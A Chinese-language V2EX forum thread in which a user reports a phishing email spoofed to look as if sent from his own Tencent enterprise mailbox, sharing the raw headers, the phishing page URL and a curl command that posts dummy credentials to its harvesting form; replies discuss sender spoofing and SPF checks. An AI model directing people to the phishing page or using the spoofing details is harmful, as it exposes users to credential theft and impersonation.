收到一封钓鱼邮件,发件人是我自己

2017-08-22 12:29:29 +08:00
 jinyang656


腾讯域名邮箱,竟然没被当成垃圾邮件处理。

钓鱼页面: http://qiye.whxdcq.com/ie

表单提交地址,无聊的可以玩玩:

curl -X POST \
  http://qiye.whxdcq.com/ie/save.asp \
  -H 'content-type: application/x-www-form-urlencoded' \
  -d 'u=admin@qq.com&p=passwd'

邮件头,有兴趣的也可以看看

Received: from erayt.com (unknown [60.191.63.180])
	by newmx3.qq.com (NewMx) with SMTP id 
	for <admin@...com>; Mon, 21 Aug 2017 21:35:43 +0800
X-QQ-SPAM: true
X-QQ-FEAT: Ka0M1TYdugwqCAeY6kY2SBJwVR3iqI8bLw3raVu5b+a+Iqjr7LDdXzv8Pn50b
	N02fwO5dcgzDawkuHVuHbXbB3qc2aE30xo5+FN1sXIOXhmWDBwCglJZd6kKYpKJLyh7HFpY
	NrA6XXHec+BAhquvRr9wwGGJ3P6/Cr/7NM6XQ0LVmIsu9OTY0x6ojRylh6oPZ7q/LQgi20p
	v3z7ADI4e8sNuNxt1EXPjIwxeWRbTm92UvuPgX8BB9S8eFYcXvWoglzX6ejQ6b1P41jfJR6
	sflBbCpL+qeHSP9yEvwjOAINNT0M77RRXIYVpFaDmx4tnYIbZVdHxU6siFiRdhD+7YfQ==
X-QQ-MAILINFO: N5kFcZDRcyD8HvFeTaRXb1MPKVHN6Hv0QG+vensX1m7GQv5+hfgOVnglb
	kxqL7pLncN1tpVPcJ4U9wB/O/ncpIfEqzTvoGzwNkwoFON/Bsi/TxZpJk0ML7RC+zeYPBja
	x5lNLf/WUR6DBD1szGqnqEciP1z05vx08S3pucZQ2VnQ9nzyuVYdI2DYg/twJdbMyQ==
X-QQ-mid: mx3t1503322543t13l0kl1m
X-QQ-ORGSender: admin@....com
Received: from uhlkp ([180.121.129.135])
	(authenticated bits=0)
	by erayt.com (8.14.4/8.14.4) with ESMTP id v7LDZJaj016203
	for <admin@...com>; Mon, 21 Aug 2017 21:35:20 +0800
Message-Id: <201708211335.v7LDZJaj016203@erayt.com>
Reply-To: 3171775896@qq.com
From: ... <admin@....com>
Subject: =?utf-8?B?6YKu566x6Kej5Ya777yM5byC5bi4aXA6OD?=
	=?utf-8?B?LjUz?=
Date: Mon, 21 Aug 2017 21:35:17 +0800
4096 次点击
所在节点    这个世界不完美
10 条回复
110male
2017-08-22 12:58:04 +08:00
原来你是做这行的!鱼好卖吗?
TuSDK
2017-08-22 13:56:12 +08:00
O(∩_∩)O~
hugedata
2017-08-22 14:21:54 +08:00
好钓吗?吃口咋样?哈哈哈
mcone
2017-08-22 14:35:50 +08:00
email 是可以伪造发信人的啊 这个还需要怎么讨论。。。

另外 很久没用过腾讯的邮箱 我记得之前 qq 邮箱在这种情况下是有提示的(在发信人邮箱之后) 不知道你这个为啥没有
jinyang656
2017-08-22 14:39:24 +08:00
@mcone 这不就是需要讨论的地方么,发信人是可以随便伪造,但是怎么才能伪造得连 QQ 邮箱都没识别出来
caomu
2017-08-22 14:47:34 +08:00
qq 大概都不判断 spf ?
atc
2017-08-22 14:55:10 +08:00
你的域名设置了 spf 记录吗
jinyang656
2017-08-22 14:55:48 +08:00
@caomu 看邮件头里 X-QQ-SPAM: true,也许这是个 bug 也说不定
mcone
2017-08-22 17:30:46 +08:00
@jinyang656 正想回复你呢 发现你已经看到了

在邮件头里的 QQ-SPAM 字段都有提示了,只能说明很可能是目前 qq 企业邮箱现在不提供 spam 或发信人检测提醒,或者你给他关掉了……

伪造发信人如果真的能骗过 qq 邮箱……要是真的有人知道,肯定也不会在这里讨论,这个能算上黑产了吧;配合各种已有地下产业链,利润简直不能想象
qq292382270
2017-08-22 17:52:02 +08:00
这个可以伪造的... 比如我测试过的 admin 艾特 baidu 点 com 邮箱就可以随意发.. 不知道现在是否还能 .. 半年前的事

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/384806

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX